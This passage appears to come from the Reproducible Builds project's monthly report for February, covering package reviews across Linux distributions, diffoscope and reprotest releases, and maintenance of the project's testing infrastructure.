Distribution work In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to Debian s knowledge about identified issues. A number of issue types were updated as well. [ ][ ][ ][ ] In addition, Roland Clobus posted his 23rd update of the status of reproducible ISO images on our mailing list. In particular, Roland helpfully summarised that all major desktops build reproducibly with bullseye, bookworm, trixie and sid provided they are built for a second time within the same DAK run (i.e. [within] 6 hours) and that there will likely be further work at a MiniDebCamp in Hamburg. Furthermore, Roland also responded in-depth to a query about a previous report
Fedora developer Zbigniew J drzejewski-Szmek announced a work-in-progress script called fedora-repro-build that attempts to reproduce an existing package within a koji build environment. Although the projects README file lists a number of fields will always or almost always vary and there is a non-zero list of other known issues, this is an excellent first step towards full Fedora reproducibility.
Jelle van der Waa introduced a new linter rule for Arch Linux packages in order to detect cache files leftover by the Sphinx documentation generator which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.
Elsewhere, Bernhard M. Wiedemann posted another monthly update for his work elsewhere in openSUSE.

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 256, 257 and 258 to Debian and made the following additional changes:
  • Use a deterministic name instead of trusting gpg s use-embedded-filenames. Many thanks to Daniel Kahn Gillmor dkg@debian.org for reporting this issue and providing feedback. [ ][ ]
  • Don t error-out with a traceback if we encounter struct.unpack-related errors when parsing Python .pyc files. (#1064973). [ ]
  • Don t try and compare rdb_expected_diff on non-GNU systems as %p formatting can vary, especially with respect to MacOS. [ ]
  • Fix compatibility with pytest 8.0. [ ]
  • Temporarily fix support for Python 3.11.8. [ ]
  • Use the 7zip package (over p7zip-full) after a Debian package transition. (#1063559). [ ]
  • Bump the minimum Black source code reformatter requirement to 24.1.1+. [ ]
  • Expand an older changelog entry with a CVE reference. [ ]
  • Make test_zip black clean. [ ]
In addition, James Addison contributed a patch to parse the headers from the diff(1) correctly [ ][ ] thanks! And lastly, Vagrant Cascadian pushed updates in GNU Guix for diffoscope to version 255, 256, and 258, and updated trydiffoscope to 67.0.6.

reprotest reprotest is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:
  • Create a (working) proof of concept for enabling a specific number of CPUs. [ ][ ]
  • Consistently use 398 days for time variation rather than choosing randomly and update README.rst to match. [ ][ ]
  • Support a new --vary=build_path.path option. [ ][ ][ ][ ]

Website updates There were made a number of improvements to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework (available at tests.reproducible-builds.org) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:
  • Debian-related changes:
    • Temporarily disable upgrading/bootstrapping Debian unstable and experimental as they are currently broken. [ ][ ]
    • Use the 64-bit amd64 kernel on all i386 nodes; no more 686 PAE kernels. [ ]
    • Add an Erlang package set. [ ]
  • Other changes:
    • Grant Jan-Benedict Glaw shell access to the Jenkins node. [ ]
    • Enable debugging for NetBSD reproducibility testing. [ ]
    • Use /usr/bin/du --apparent-size in the Jenkins shell monitor. [ ]
    • Revert reproducible nodes: mark osuosl2 as down . [ ]
    • Thanks again to Codethink, for they have doubled the RAM on our arm64 nodes. [ ]
    • Only set /proc/$pid/oom_score_adj to -1000 if it has not already been done. [ ]
    • Add the opemwrt-target-tegra and jtx task to the list of zombie jobs. [ ][ ]
Vagrant Cascadian also made the following changes:
  • Overhaul the handling of OpenSSH configuration files after updating from Debian bookworm. [ ][ ][ ]
  • Add two new armhf architecture build nodes, virt32z and virt64z, and insert them into the Munin monitoring. [ ][ ] [ ][ ]
In addition, Alexander Couzens updated the OpenWrt configuration in order to replace the tegra target with mpc85xx [ ], Jan-Benedict Glaw updated the NetBSD build script to use a separate $TMPDIR to mitigate out of space issues on a tmpfs-backed /tmp [ ] and Zheng Junjie added a link to the GNU Guix tests [ ]. Lastly, node maintenance was performed by Holger Levsen [ ][ ][ ][ ][ ][ ] and Vagrant Cascadian [ ][ ][ ][ ].

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Next.